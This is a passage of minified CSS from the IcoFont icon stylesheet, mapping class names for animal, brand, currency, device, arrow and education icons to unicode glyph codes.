tent:"\e854"}.icofont-fox-alt:before{content:"\e855"}.icofont-fox:before{content:"\e856"}.icofont-frog-tracks:before{content:"\e857"}.icofont-frog:before{content:"\e858"}.icofont-froggy:before{content:"\e859"}.icofont-giraffe-head-1:before{content:"\e85a"}.icofont-giraffe-head-2:before{content:"\e85b"}.icofont-giraffe-head:before{content:"\e85c"}.icofont-giraffe:before{content:"\e85d"}.icofont-goat-head:before{content:"\e85e"}.icofont-gorilla:before{content:"\e85f"}.icofont-hen-tracks:before{content:"\e860"}.icofont-horse-head-1:before{content:"\e861"}.icofont-horse-head-2:before{content:"\e862"}.icofont-horse-head:before{content:"\e863"}.icofont-horse-tracks:before{content:"\e864"}.icofont-jellyfish:before{content:"\e865"}.icofont-kangaroo:before{content:"\e866"}.icofont-lemur:before{content:"\e867"}.icofont-lion-head-1:before{content:"\e868"}.icofont-lion-head-2:before{content:"\e869"}.icofont-lion-head:before{content:"\e86a"}.icofont-lion:before{content:"\e86b"}.icofont-monkey-2:before{content:"\e86c"}.icofont-monkey-3:before{content:"\e86d"}.icofont-monkey-face:before{content:"\e86e"}.icofont-monkey:before{content:"\e86f"}.icofont-octopus-alt:before{content:"\e870"}.icofont-octopus:before{content:"\e871"}.icofont-owl:before{content:"\e872"}.icofont-panda-face:before{content:"\e873"}.icofont-panda:before{content:"\e874"}.icofont-panther:before{content:"\e875"}.icofont-parrot-lip:before{content:"\e876"}.icofont-parrot:before{content:"\e877"}.icofont-paw:before{content:"\e878"}.icofont-pelican:before{content:"\e879"}.icofont-penguin:before{content:"\e87a"}.icofont-pig-face:before{content:"\e87b"}.icofont-pig:before{content:"\e87c"}.icofont-pigeon-1:before{content:"\e87d"}.icofont-pigeon-2:before{content:"\e87e"}.icofont-pigeon:before{content:"\e87f"}.icofont-rabbit:before{content:"\e880"}.icofont-rat:before{content:"\e881"}.icofont-rhino-head:before{content:"\e882"}.icofont-rhino:before{content:"\e883"}.icofont-rooster:before{content:"\e884"}.icofont-seahorse:before{content:"\e885"}.icofont-seal:before{content:"\e886"}.icofont-shrimp-alt:before{content:"\e887"}.icofont-shrimp:before{content:"\e888"}.icofont-snail-1:before{content:"\e889"}.icofont-snail-2:before{content:"\e88a"}.icofont-snail-3:before{content:"\e88b"}.icofont-snail:before{content:"\e88c"}.icofont-snake:before{content:"\e88d"}.icofont-squid:before{content:"\e88e"}.icofont-squirrel:before{content:"\e88f"}.icofont-tiger-face:before{content:"\e890"}.icofont-tiger:before{content:"\e891"}.icofont-turtle:before{content:"\e892"}.icofont-whale:before{content:"\e893"}.icofont-woodpecker:before{content:"\e894"}.icofont-zebra:before{content:"\e895"}.icofont-brand-acer:before{content:"\e896"}.icofont-brand-adidas:before{content:"\e897"}.icofont-brand-adobe:before{content:"\e898"}.icofont-brand-air-new-zealand:before{content:"\e899"}.icofont-brand-airbnb:before{content:"\e89a"}.icofont-brand-aircell:before{content:"\e89b"}.icofont-brand-airtel:before{content:"\e89c"}.icofont-brand-alcatel:before{content:"\e89d"}.icofont-brand-alibaba:before{content:"\e89e"}.icofont-brand-aliexpress:before{content:"\e89f"}.icofont-brand-alipay:before{content:"\e8a0"}.icofont-brand-amazon:before{content:"\e8a1"}.icofont-brand-amd:before{content:"\e8a2"}.icofont-brand-american-airlines:before{content:"\e8a3"}.icofont-brand-android-robot:before{content:"\e8a4"}.icofont-brand-android:before{content:"\e8a5"}.icofont-brand-aol:before{content:"\e8a6"}.icofont-brand-apple:before{content:"\e8a7"}.icofont-brand-appstore:before{content:"\e8a8"}.icofont-brand-asus:before{content:"\e8a9"}.icofont-brand-ati:before{content:"\e8aa"}.icofont-brand-att:before{content:"\e8ab"}.icofont-brand-audi:before{content:"\e8ac"}.icofont-brand-axiata:before{content:"\e8ad"}.icofont-brand-bada:before{content:"\e8ae"}.icofont-brand-bbc:before{content:"\e8af"}.icofont-brand-bing:before{content:"\e8b0"}.icofont-brand-blackberry:before{content:"\e8b1"}.icofont-brand-bmw:before{content:"\e8b2"}.icofont-brand-box:before{content:"\e8b3"}.icofont-brand-burger-king:before{content:"\e8b4"}.icofont-brand-business-insider:before{content:"\e8b5"}.icofont-brand-buzzfeed:before{content:"\e8b6"}.icofont-brand-cannon:before{content:"\e8b7"}.icofont-brand-casio:before{content:"\e8b8"}.icofont-brand-china-mobile:before{content:"\e8b9"}.icofont-brand-china-telecom:before{content:"\e8ba"}.icofont-brand-china-unicom:before{content:"\e8bb"}.icofont-brand-cisco:before{content:"\e8bc"}.icofont-brand-citibank:before{content:"\e8bd"}.icofont-brand-cnet:before{content:"\e8be"}.icofont-brand-cnn:before{content:"\e8bf"}.icofont-brand-cocal-cola:before{content:"\e8c0"}.icofont-brand-compaq:before{content:"\e8c1"}.icofont-brand-debian:before{content:"\e8c2"}.icofont-brand-delicious:before{content:"\e8c3"}.icofont-brand-dell:before{content:"\e8c4"}.icofont-brand-designbump:before{content:"\e8c5"}.icofont-brand-designfloat:before{content:"\e8c6"}.icofont-brand-disney:before{content:"\e8c7"}.icofont-brand-dodge:before{content:"\e8c8"}.icofont-brand-dove:before{content:"\e8c9"}.icofont-brand-drupal:before{content:"\e8ca"}.icofont-brand-ebay:before{content:"\e8cb"}.icofont-brand-eleven:before{content:"\e8cc"}.icofont-brand-emirates:before{content:"\e8cd"}.icofont-brand-espn:before{content:"\e8ce"}.icofont-brand-etihad-airways:before{content:"\e8cf"}.icofont-brand-etisalat:before{content:"\e8d0"}.icofont-brand-etsy:before{content:"\e8d1"}.icofont-brand-fastrack:before{content:"\e8d2"}.icofont-brand-fedex:before{content:"\e8d3"}.icofont-brand-ferrari:before{content:"\e8d4"}.icofont-brand-fitbit:before{content:"\e8d5"}.icofont-brand-flikr:before{content:"\e8d6"}.icofont-brand-forbes:before{content:"\e8d7"}.icofont-brand-foursquare:before{content:"\e8d8"}.icofont-brand-foxconn:before{content:"\e8d9"}.icofont-brand-fujitsu:before{content:"\e8da"}.icofont-brand-general-electric:before{content:"\e8db"}.icofont-brand-gillette:before{content:"\e8dc"}.icofont-brand-gizmodo:before{content:"\e8dd"}.icofont-brand-gnome:before{content:"\e8de"}.icofont-brand-google:before{content:"\e8df"}.icofont-brand-gopro:before{content:"\e8e0"}.icofont-brand-gucci:before{content:"\e8e1"}.icofont-brand-hallmark:before{content:"\e8e2"}.icofont-brand-hi5:before{content:"\e8e3"}.icofont-brand-honda:before{content:"\e8e4"}.icofont-brand-hp:before{content:"\e8e5"}.icofont-brand-hsbc:before{content:"\e8e6"}.icofont-brand-htc:before{content:"\e8e7"}.icofont-brand-huawei:before{content:"\e8e8"}.icofont-brand-hulu:before{content:"\e8e9"}.icofont-brand-hyundai:before{content:"\e8ea"}.icofont-brand-ibm:before{content:"\e8eb"}.icofont-brand-icofont:before{content:"\e8ec"}.icofont-brand-icq:before{content:"\e8ed"}.icofont-brand-ikea:before{content:"\e8ee"}.icofont-brand-imdb:before{content:"\e8ef"}.icofont-brand-indiegogo:before{content:"\e8f0"}.icofont-brand-intel:before{content:"\e8f1"}.icofont-brand-ipair:before{content:"\e8f2"}.icofont-brand-jaguar:before{content:"\e8f3"}.icofont-brand-java:before{content:"\e8f4"}.icofont-brand-joomla:before{content:"\e8f5"}.icofont-brand-kickstarter:before{content:"\e8f6"}.icofont-brand-kik:before{content:"\e8f7"}.icofont-brand-lastfm:before{content:"\e8f8"}.icofont-brand-lego:before{content:"\e8f9"}.icofont-brand-lenovo:before{content:"\e8fa"}.icofont-brand-levis:before{content:"\e8fb"}.icofont-brand-lexus:before{content:"\e8fc"}.icofont-brand-lg:before{content:"\e8fd"}.icofont-brand-life-hacker:before{content:"\e8fe"}.icofont-brand-linux-mint:before{content:"\e8ff"}.icofont-brand-linux:before{content:"\e900"}.icofont-brand-lionix:before{content:"\e901"}.icofont-brand-loreal:before{content:"\e902"}.icofont-brand-louis-vuitton:before{content:"\e903"}.icofont-brand-mac-os:before{content:"\e904"}.icofont-brand-marvel-app:before{content:"\e905"}.icofont-brand-mashable:before{content:"\e906"}.icofont-brand-mazda:before{content:"\e907"}.icofont-brand-mcdonals:before{content:"\e908"}.icofont-brand-mercedes:before{content:"\e909"}.icofont-brand-micromax:before{content:"\e90a"}.icofont-brand-microsoft:before{content:"\e90b"}.icofont-brand-mobileme:before{content:"\e90c"}.icofont-brand-mobily:before{content:"\e90d"}.icofont-brand-motorola:before{content:"\e90e"}.icofont-brand-msi:before{content:"\e90f"}.icofont-brand-mts:before{content:"\e910"}.icofont-brand-myspace:before{content:"\e911"}.icofont-brand-mytv:before{content:"\e912"}.icofont-brand-nasa:before{content:"\e913"}.icofont-brand-natgeo:before{content:"\e914"}.icofont-brand-nbc:before{content:"\e915"}.icofont-brand-nescafe:before{content:"\e916"}.icofont-brand-nestle:before{content:"\e917"}.icofont-brand-netflix:before{content:"\e918"}.icofont-brand-nexus:before{content:"\e919"}.icofont-brand-nike:before{content:"\e91a"}.icofont-brand-nokia:before{content:"\e91b"}.icofont-brand-nvidia:before{content:"\e91c"}.icofont-brand-omega:before{content:"\e91d"}.icofont-brand-opensuse:before{content:"\e91e"}.icofont-brand-oracle:before{content:"\e91f"}.icofont-brand-panasonic:before{content:"\e920"}.icofont-brand-paypal:before{content:"\e921"}.icofont-brand-pepsi:before{content:"\e922"}.icofont-brand-philips:before{content:"\e923"}.icofont-brand-pizza-hut:before{content:"\e924"}.icofont-brand-playstation:before{content:"\e925"}.icofont-brand-puma:before{content:"\e926"}.icofont-brand-qatar-air:before{content:"\e927"}.icofont-brand-qvc:before{content:"\e928"}.icofont-brand-readernaut:before{content:"\e929"}.icofont-brand-redbull:before{content:"\e92a"}.icofont-brand-reebok:before{content:"\e92b"}.icofont-brand-reuters:before{content:"\e92c"}.icofont-brand-samsung:before{content:"\e92d"}.icofont-brand-sap:before{content:"\e92e"}.icofont-brand-saudia-airlines:before{content:"\e92f"}.icofont-brand-scribd:before{content:"\e930"}.icofont-brand-shell:before{content:"\e931"}.icofont-brand-siemens:before{content:"\e932"}.icofont-brand-sk-telecom:before{content:"\e933"}.icofont-brand-slideshare:before{content:"\e934"}.icofont-brand-smashing-magazine:before{content:"\e935"}.icofont-brand-snapchat:before{content:"\e936"}.icofont-brand-sony-ericsson:before{content:"\e937"}.icofont-brand-sony:before{content:"\e938"}.icofont-brand-soundcloud:before{content:"\e939"}.icofont-brand-sprint:before{content:"\e93a"}.icofont-brand-squidoo:before{content:"\e93b"}.icofont-brand-starbucks:before{content:"\e93c"}.icofont-brand-stc:before{content:"\e93d"}.icofont-brand-steam:before{content:"\e93e"}.icofont-brand-suzuki:before{content:"\e93f"}.icofont-brand-symbian:before{content:"\e940"}.icofont-brand-t-mobile:before{content:"\e941"}.icofont-brand-tango:before{content:"\e942"}.icofont-brand-target:before{content:"\e943"}.icofont-brand-tata-indicom:before{content:"\e944"}.icofont-brand-techcrunch:before{content:"\e945"}.icofont-brand-telenor:before{content:"\e946"}.icofont-brand-teliasonera:before{content:"\e947"}.icofont-brand-tesla:before{content:"\e948"}.icofont-brand-the-verge:before{content:"\e949"}.icofont-brand-thenextweb:before{content:"\e94a"}.icofont-brand-toshiba:before{content:"\e94b"}.icofont-brand-toyota:before{content:"\e94c"}.icofont-brand-tribenet:before{content:"\e94d"}.icofont-brand-ubuntu:before{content:"\e94e"}.icofont-brand-unilever:before{content:"\e94f"}.icofont-brand-vaio:before{content:"\e950"}.icofont-brand-verizon:before{content:"\e951"}.icofont-brand-viber:before{content:"\e952"}.icofont-brand-vodafone:before{content:"\e953"}.icofont-brand-volkswagen:before{content:"\e954"}.icofont-brand-walmart:before{content:"\e955"}.icofont-brand-warnerbros:before{content:"\e956"}.icofont-brand-whatsapp:before{content:"\e957"}.icofont-brand-wikipedia:before{content:"\e958"}.icofont-brand-windows:before{content:"\e959"}.icofont-brand-wire:before{content:"\e95a"}.icofont-brand-wordpress:before{content:"\e95b"}.icofont-brand-xiaomi:before{content:"\e95c"}.icofont-brand-yahoobuzz:before{content:"\e95d"}.icofont-brand-yamaha:before{content:"\e95e"}.icofont-brand-youtube:before{content:"\e95f"}.icofont-brand-zain:before{content:"\e960"}.icofont-bank-alt:before{content:"\e961"}.icofont-bank:before{content:"\e962"}.icofont-barcode:before{content:"\e963"}.icofont-bill-alt:before{content:"\e964"}.icofont-billboard:before{content:"\e965"}.icofont-briefcase-1:before{content:"\e966"}.icofont-briefcase-2:before{content:"\e967"}.icofont-businessman:before{content:"\e968"}.icofont-businesswoman:before{content:"\e969"}.icofont-chair:before{content:"\e96a"}.icofont-coins:before{content:"\e96b"}.icofont-company:before{content:"\e96c"}.icofont-contact-add:before{content:"\e96d"}.icofont-files-stack:before{content:"\e96e"}.icofont-handshake-deal:before{content:"\e96f"}.icofont-id-card:before{content:"\e970"}.icofont-meeting-add:before{content:"\e971"}.icofont-money-bag:before{content:"\e972"}.icofont-pie-chart:before{content:"\e973"}.icofont-presentation-alt:before{content:"\e974"}.icofont-presentation:before{content:"\e975"}.icofont-stamp:before{content:"\e976"}.icofont-stock-mobile:before{content:"\e977"}.icofont-chart-arrows-axis:before{content:"\e978"}.icofont-chart-bar-graph:before{content:"\e979"}.icofont-chart-flow-1:before{content:"\e97a"}.icofont-chart-flow-2:before{content:"\e97b"}.icofont-chart-flow:before{content:"\e97c"}.icofont-chart-growth:before{content:"\e97d"}.icofont-chart-histogram-alt:before{content:"\e97e"}.icofont-chart-histogram:before{content:"\e97f"}.icofont-chart-line-alt:before{content:"\e980"}.icofont-chart-line:before{content:"\e981"}.icofont-chart-pie-alt:before{content:"\e982"}.icofont-chart-pie:before{content:"\e983"}.icofont-chart-radar-graph:before{content:"\e984"}.icofont-architecture-alt:before{content:"\e985"}.icofont-architecture:before{content:"\e986"}.icofont-barricade:before{content:"\e987"}.icofont-bolt:before{content:"\e988"}.icofont-bricks:before{content:"\e989"}.icofont-building-alt:before{content:"\e98a"}.icofont-bull-dozer:before{content:"\e98b"}.icofont-calculations:before{content:"\e98c"}.icofont-cement-mix:before{content:"\e98d"}.icofont-cement-mixer:before{content:"\e98e"}.icofont-concrete-mixer:before{content:"\e98f"}.icofont-danger-zone:before{content:"\e990"}.icofont-drill:before{content:"\e991"}.icofont-eco-energy:before{content:"\e992"}.icofont-eco-environmen:before{content:"\e993"}.icofont-energy-air:before{content:"\e994"}.icofont-energy-oil:before{content:"\e995"}.icofont-energy-savings:before{content:"\e996"}.icofont-energy-solar:before{content:"\e997"}.icofont-energy-water:before{content:"\e998"}.icofont-engineer:before{content:"\e999"}.icofont-fire-extinguisher-alt:before{content:"\e99a"}.icofont-fire-extinguisher:before{content:"\e99b"}.icofont-fix-tools:before{content:"\e99c"}.icofont-fork-lift:before{content:"\e99d"}.icofont-glue-oil:before{content:"\e99e"}.icofont-hammer-alt:before{content:"\e99f"}.icofont-hammer:before{content:"\e9a0"}.icofont-help-robot:before{content:"\e9a1"}.icofont-industries-1:before{content:"\e9a2"}.icofont-industries-2:before{content:"\e9a3"}.icofont-industries-3:before{content:"\e9a4"}.icofont-industries-4:before{content:"\e9a5"}.icofont-industries-5:before{content:"\e9a6"}.icofont-industries:before{content:"\e9a7"}.icofont-labour:before{content:"\e9a8"}.icofont-mining:before{content:"\e9a9"}.icofont-paint-brush:before{content:"\e9aa"}.icofont-pollution:before{content:"\e9ab"}.icofont-power-zone:before{content:"\e9ac"}.icofont-radio-active:before{content:"\e9ad"}.icofont-recycle-alt:before{content:"\e9ae"}.icofont-recycling-man:before{content:"\e9af"}.icofont-safety-hat-light:before{content:"\e9b0"}.icofont-safety-hat:before{content:"\e9b1"}.icofont-saw:before{content:"\e9b2"}.icofont-screw-driver:before{content:"\e9b3"}.icofont-tools-1:before{content:"\e9b4"}.icofont-tools-bag:before{content:"\e9b5"}.icofont-tow-truck:before{content:"\e9b6"}.icofont-trolley:before{content:"\e9b7"}.icofont-trowel:before{content:"\e9b8"}.icofont-under-construction-alt:before{content:"\e9b9"}.icofont-under-construction:before{content:"\e9ba"}.icofont-vehicle-cement:before{content:"\e9bb"}.icofont-vehicle-crane:before{content:"\e9bc"}.icofont-vehicle-delivery-van:before{content:"\e9bd"}.icofont-vehicle-dozer:before{content:"\e9be"}.icofont-vehicle-excavator:before{content:"\e9bf"}.icofont-vehicle-trucktor:before{content:"\e9c0"}.icofont-vehicle-wrecking:before{content:"\e9c1"}.icofont-worker:before{content:"\e9c2"}.icofont-workers-group:before{content:"\e9c3"}.icofont-wrench:before{content:"\e9c4"}.icofont-afghani-false:before{content:"\e9c5"}.icofont-afghani-minus:before{content:"\e9c6"}.icofont-afghani-plus:before{content:"\e9c7"}.icofont-afghani-true:before{content:"\e9c8"}.icofont-afghani:before{content:"\e9c9"}.icofont-baht-false:before{content:"\e9ca"}.icofont-baht-minus:before{content:"\e9cb"}.icofont-baht-plus:before{content:"\e9cc"}.icofont-baht-true:before{content:"\e9cd"}.icofont-baht:before{content:"\e9ce"}.icofont-bitcoin-false:before{content:"\e9cf"}.icofont-bitcoin-minus:before{content:"\e9d0"}.icofont-bitcoin-plus:before{content:"\e9d1"}.icofont-bitcoin-true:before{content:"\e9d2"}.icofont-bitcoin:before{content:"\e9d3"}.icofont-dollar-flase:before{content:"\e9d4"}.icofont-dollar-minus:before{content:"\e9d5"}.icofont-dollar-plus:before{content:"\e9d6"}.icofont-dollar-true:before{content:"\e9d7"}.icofont-dollar:before{content:"\e9d8"}.icofont-dong-false:before{content:"\e9d9"}.icofont-dong-minus:before{content:"\e9da"}.icofont-dong-plus:before{content:"\e9db"}.icofont-dong-true:before{content:"\e9dc"}.icofont-dong:before{content:"\e9dd"}.icofont-euro-false:before{content:"\e9de"}.icofont-euro-minus:before{content:"\e9df"}.icofont-euro-plus:before{content:"\e9e0"}.icofont-euro-true:before{content:"\e9e1"}.icofont-euro:before{content:"\e9e2"}.icofont-frank-false:before{content:"\e9e3"}.icofont-frank-minus:before{content:"\e9e4"}.icofont-frank-plus:before{content:"\e9e5"}.icofont-frank-true:before{content:"\e9e6"}.icofont-frank:before{content:"\e9e7"}.icofont-hryvnia-false:before{content:"\e9e8"}.icofont-hryvnia-minus:before{content:"\e9e9"}.icofont-hryvnia-plus:before{content:"\e9ea"}.icofont-hryvnia-true:before{content:"\e9eb"}.icofont-hryvnia:before{content:"\e9ec"}.icofont-lira-false:before{content:"\e9ed"}.icofont-lira-minus:before{content:"\e9ee"}.icofont-lira-plus:before{content:"\e9ef"}.icofont-lira-true:before{content:"\e9f0"}.icofont-lira:before{content:"\e9f1"}.icofont-peseta-false:before{content:"\e9f2"}.icofont-peseta-minus:before{content:"\e9f3"}.icofont-peseta-plus:before{content:"\e9f4"}.icofont-peseta-true:before{content:"\e9f5"}.icofont-peseta:before{content:"\e9f6"}.icofont-peso-false:before{content:"\e9f7"}.icofont-peso-minus:before{content:"\e9f8"}.icofont-peso-plus:before{content:"\e9f9"}.icofont-peso-true:before{content:"\e9fa"}.icofont-peso:before{content:"\e9fb"}.icofont-pound-false:before{content:"\e9fc"}.icofont-pound-minus:before{content:"\e9fd"}.icofont-pound-plus:before{content:"\e9fe"}.icofont-pound-true:before{content:"\e9ff"}.icofont-pound:before{content:"\ea00"}.icofont-renminbi-false:before{content:"\ea01"}.icofont-renminbi-minus:before{content:"\ea02"}.icofont-renminbi-plus:before{content:"\ea03"}.icofont-renminbi-true:before{content:"\ea04"}.icofont-renminbi:before{content:"\ea05"}.icofont-riyal-false:before{content:"\ea06"}.icofont-riyal-minus:before{content:"\ea07"}.icofont-riyal-plus:before{content:"\ea08"}.icofont-riyal-true:before{content:"\ea09"}.icofont-riyal:before{content:"\ea0a"}.icofont-rouble-false:before{content:"\ea0b"}.icofont-rouble-minus:before{content:"\ea0c"}.icofont-rouble-plus:before{content:"\ea0d"}.icofont-rouble-true:before{content:"\ea0e"}.icofont-rouble:before{content:"\ea0f"}.icofont-rupee-false:before{content:"\ea10"}.icofont-rupee-minus:before{content:"\ea11"}.icofont-rupee-plus:before{content:"\ea12"}.icofont-rupee-true:before{content:"\ea13"}.icofont-rupee:before{content:"\ea14"}.icofont-taka-false:before{content:"\ea15"}.icofont-taka-minus:before{content:"\ea16"}.icofont-taka-plus:before{content:"\ea17"}.icofont-taka-true:before{content:"\ea18"}.icofont-taka:before{content:"\ea19"}.icofont-turkish-lira-false:before{content:"\ea1a"}.icofont-turkish-lira-minus:before{content:"\ea1b"}.icofont-turkish-lira-plus:before{content:"\ea1c"}.icofont-turkish-lira-true:before{content:"\ea1d"}.icofont-turkish-lira:before{content:"\ea1e"}.icofont-won-false:before{content:"\ea1f"}.icofont-won-minus:before{content:"\ea20"}.icofont-won-plus:before{content:"\ea21"}.icofont-won-true:before{content:"\ea22"}.icofont-won:before{content:"\ea23"}.icofont-yen-false:before{content:"\ea24"}.icofont-yen-minus:before{content:"\ea25"}.icofont-yen-plus:before{content:"\ea26"}.icofont-yen-true:before{content:"\ea27"}.icofont-yen:before{content:"\ea28"}.icofont-android-nexus:before{content:"\ea29"}.icofont-android-tablet:before{content:"\ea2a"}.icofont-apple-watch:before{content:"\ea2b"}.icofont-drawing-tablet:before{content:"\ea2c"}.icofont-earphone:before{content:"\ea2d"}.icofont-flash-drive:before{content:"\ea2e"}.icofont-game-console:before{content:"\ea2f"}.icofont-game-controller:before{content:"\ea30"}.icofont-game-pad:before{content:"\ea31"}.icofont-game:before{content:"\ea32"}.icofont-headphone-alt-1:before{content:"\ea33"}.icofont-headphone-alt-2:before{content:"\ea34"}.icofont-headphone-alt-3:before{content:"\ea35"}.icofont-headphone-alt:before{content:"\ea36"}.icofont-headphone:before{content:"\ea37"}.icofont-htc-one:before{content:"\ea38"}.icofont-imac:before{content:"\ea39"}.icofont-ipad:before{content:"\ea3a"}.icofont-iphone:before{content:"\ea3b"}.icofont-ipod-nano:before{content:"\ea3c"}.icofont-ipod-touch:before{content:"\ea3d"}.icofont-keyboard-alt:before{content:"\ea3e"}.icofont-keyboard-wireless:before{content:"\ea3f"}.icofont-keyboard:before{content:"\ea40"}.icofont-laptop-alt:before{content:"\ea41"}.icofont-laptop:before{content:"\ea42"}.icofont-macbook:before{content:"\ea43"}.icofont-magic-mouse:before{content:"\ea44"}.icofont-micro-chip:before{content:"\ea45"}.icofont-microphone-alt:before{content:"\ea46"}.icofont-microphone:before{content:"\ea47"}.icofont-monitor:before{content:"\ea48"}.icofont-mouse:before{content:"\ea49"}.icofont-mp3-player:before{content:"\ea4a"}.icofont-nintendo:before{content:"\ea4b"}.icofont-playstation-alt:before{content:"\ea4c"}.icofont-psvita:before{content:"\ea4d"}.icofont-radio-mic:before{content:"\ea4e"}.icofont-radio:before{content:"\ea4f"}.icofont-refrigerator:before{content:"\ea50"}.icofont-samsung-galaxy:before{content:"\ea51"}.icofont-surface-tablet:before{content:"\ea52"}.icofont-ui-head-phone:before{content:"\ea53"}.icofont-ui-keyboard:before{content:"\ea54"}.icofont-washing-machine:before{content:"\ea55"}.icofont-wifi-router:before{content:"\ea56"}.icofont-wii-u:before{content:"\ea57"}.icofont-windows-lumia:before{content:"\ea58"}.icofont-wireless-mouse:before{content:"\ea59"}.icofont-xbox-360:before{content:"\ea5a"}.icofont-arrow-down:before{content:"\ea5b"}.icofont-arrow-left:before{content:"\ea5c"}.icofont-arrow-right:before{content:"\ea5d"}.icofont-arrow-up:before{content:"\ea5e"}.icofont-block-down:before{content:"\ea5f"}.icofont-block-left:before{content:"\ea60"}.icofont-block-right:before{content:"\ea61"}.icofont-block-up:before{content:"\ea62"}.icofont-bubble-down:before{content:"\ea63"}.icofont-bubble-left:before{content:"\ea64"}.icofont-bubble-right:before{content:"\ea65"}.icofont-bubble-up:before{content:"\ea66"}.icofont-caret-down:before{content:"\ea67"}.icofont-caret-left:before{content:"\ea68"}.icofont-caret-right:before{content:"\ea69"}.icofont-caret-up:before{content:"\ea6a"}.icofont-circled-down:before{content:"\ea6b"}.icofont-circled-left:before{content:"\ea6c"}.icofont-circled-right:before{content:"\ea6d"}.icofont-circled-up:before{content:"\ea6e"}.icofont-collapse:before{content:"\ea6f"}.icofont-cursor-drag:before{content:"\ea70"}.icofont-curved-double-left:before{content:"\ea71"}.icofont-curved-double-right:before{content:"\ea72"}.icofont-curved-down:before{content:"\ea73"}.icofont-curved-left:before{content:"\ea74"}.icofont-curved-right:before{content:"\ea75"}.icofont-curved-up:before{content:"\ea76"}.icofont-dotted-down:before{content:"\ea77"}.icofont-dotted-left:before{content:"\ea78"}.icofont-dotted-right:before{content:"\ea79"}.icofont-dotted-up:before{content:"\ea7a"}.icofont-double-left:before{content:"\ea7b"}.icofont-double-right:before{content:"\ea7c"}.icofont-expand-alt:before{content:"\ea7d"}.icofont-hand-down:before{content:"\ea7e"}.icofont-hand-drag:before{content:"\ea7f"}.icofont-hand-drag1:before{content:"\ea80"}.icofont-hand-drag2:before{content:"\ea81"}.icofont-hand-drawn-alt-down:before{content:"\ea82"}.icofont-hand-drawn-alt-left:before{content:"\ea83"}.icofont-hand-drawn-alt-right:before{content:"\ea84"}.icofont-hand-drawn-alt-up:before{content:"\ea85"}.icofont-hand-drawn-down:before{content:"\ea86"}.icofont-hand-drawn-left:before{content:"\ea87"}.icofont-hand-drawn-right:before{content:"\ea88"}.icofont-hand-drawn-up:before{content:"\ea89"}.icofont-hand-grippers:before{content:"\ea8a"}.icofont-hand-left:before{content:"\ea8b"}.icofont-hand-right:before{content:"\ea8c"}.icofont-hand-up:before{content:"\ea8d"}.icofont-line-block-down:before{content:"\ea8e"}.icofont-line-block-left:before{content:"\ea8f"}.icofont-line-block-right:before{content:"\ea90"}.icofont-line-block-up:before{content:"\ea91"}.icofont-long-arrow-down:before{content:"\ea92"}.icofont-long-arrow-left:before{content:"\ea93"}.icofont-long-arrow-right:before{content:"\ea94"}.icofont-long-arrow-up:before{content:"\ea95"}.icofont-rounded-collapse:before{content:"\ea96"}.icofont-rounded-double-left:before{content:"\ea97"}.icofont-rounded-double-right:before{content:"\ea98"}.icofont-rounded-down:before{content:"\ea99"}.icofont-rounded-expand:before{content:"\ea9a"}.icofont-rounded-left-down:before{content:"\ea9b"}.icofont-rounded-left-up:before{content:"\ea9c"}.icofont-rounded-left:before{content:"\ea9d"}.icofont-rounded-right-down:before{content:"\ea9e"}.icofont-rounded-right-up:before{content:"\ea9f"}.icofont-rounded-right:before{content:"\eaa0"}.icofont-rounded-up:before{content:"\eaa1"}.icofont-scroll-bubble-down:before{content:"\eaa2"}.icofont-scroll-bubble-left:before{content:"\eaa3"}.icofont-scroll-bubble-right:before{content:"\eaa4"}.icofont-scroll-bubble-up:before{content:"\eaa5"}.icofont-scroll-double-down:before{content:"\eaa6"}.icofont-scroll-double-left:before{content:"\eaa7"}.icofont-scroll-double-right:before{content:"\eaa8"}.icofont-scroll-double-up:before{content:"\eaa9"}.icofont-scroll-down:before{content:"\eaaa"}.icofont-scroll-left:before{content:"\eaab"}.icofont-scroll-long-down:before{content:"\eaac"}.icofont-scroll-long-left:before{content:"\eaad"}.icofont-scroll-long-right:before{content:"\eaae"}.icofont-scroll-long-up:before{content:"\eaaf"}.icofont-scroll-right:before{content:"\eab0"}.icofont-scroll-up:before{content:"\eab1"}.icofont-simple-down:before{content:"\eab2"}.icofont-simple-left-down:before{content:"\eab3"}.icofont-simple-left-up:before{content:"\eab4"}.icofont-simple-left:before{content:"\eab5"}.icofont-simple-right-down:before{content:"\eab6"}.icofont-simple-right-up:before{content:"\eab7"}.icofont-simple-right:before{content:"\eab8"}.icofont-simple-up:before{content:"\eab9"}.icofont-square-down:before{content:"\eaba"}.icofont-square-left:before{content:"\eabb"}.icofont-square-right:before{content:"\eabc"}.icofont-square-up:before{content:"\eabd"}.icofont-stylish-down:before{content:"\eabe"}.icofont-stylish-left:before{content:"\eabf"}.icofont-stylish-right:before{content:"\eac0"}.icofont-stylish-up:before{content:"\eac1"}.icofont-swoosh-down:before{content:"\eac2"}.icofont-swoosh-left:before{content:"\eac3"}.icofont-swoosh-right:before{content:"\eac4"}.icofont-swoosh-up:before{content:"\eac5"}.icofont-thin-double-left:before{content:"\eac6"}.icofont-thin-double-right:before{content:"\eac7"}.icofont-thin-down:before{content:"\eac8"}.icofont-thin-left:before{content:"\eac9"}.icofont-thin-right:before{content:"\eaca"}.icofont-thin-up:before{content:"\eacb"}.icofont-abc:before{content:"\eacc"}.icofont-atom:before{content:"\eacd"}.icofont-award:before{content:"\eace"}.icofont-bell-alt:before{content:"\eacf"}.icofont-black-board:before{content:"\ead0"}.icofont-book-alt:before{content:"\ead1"}.icofont-book:before{content:"\ead2"}.icofont-brainstorming:before{content:"\ead3"}.icofont-certificate-alt-1:before{content:"\ead4"}.icofont-certificate-alt-2:before{content:"\ead5"}.icofont-certificate:before{content:"\ead6"}.icofont-education:before{content:"\ead7"}.icofont-electron:before{content:"\ead8"}.icofont-fountain-pen:before{content:"\ead9"}.icofont-globe-alt:before{content:"\eada"}.icofont-graduate-alt:before{content:"\eadb"}.icofont-graduate:before{content:"\eadc"}.icofont-group-students:before{content:"\eadd"}.icofont-hat-alt:before{content:"\eade"}.icofont-hat:before{content:"\eadf"}.icofont-instrument:before{content:"\eae0"}.icofont-lamp-light:before{content:"\eae1"}.icofont-medal:before{content:"\eae2"}.icofont-microscope-alt:before{content:"\eae3"}.icofont-microscope:before{content:"\eae4"}.icofont-paper:before{content:"\eae5"}.icofont-pen-alt-4:before{content:"\eae6"}.icofont-pen-nib:before{content:"\eae7"}.icofont-pencil-alt-5:before{content:"\eae8"}.icofont-quill-pen:before{content:"\eae9"}.icofont-read-book-alt:before{content:"\eaea"}.icofont-read-book:before{content:"\eaeb"}.icofont-school-bag:before{content:"\eaec"}.icofont-school-bus:before{content:"\eaed"}.icofont-student-alt:before{content:"\eaee"}.icofont-student:before{con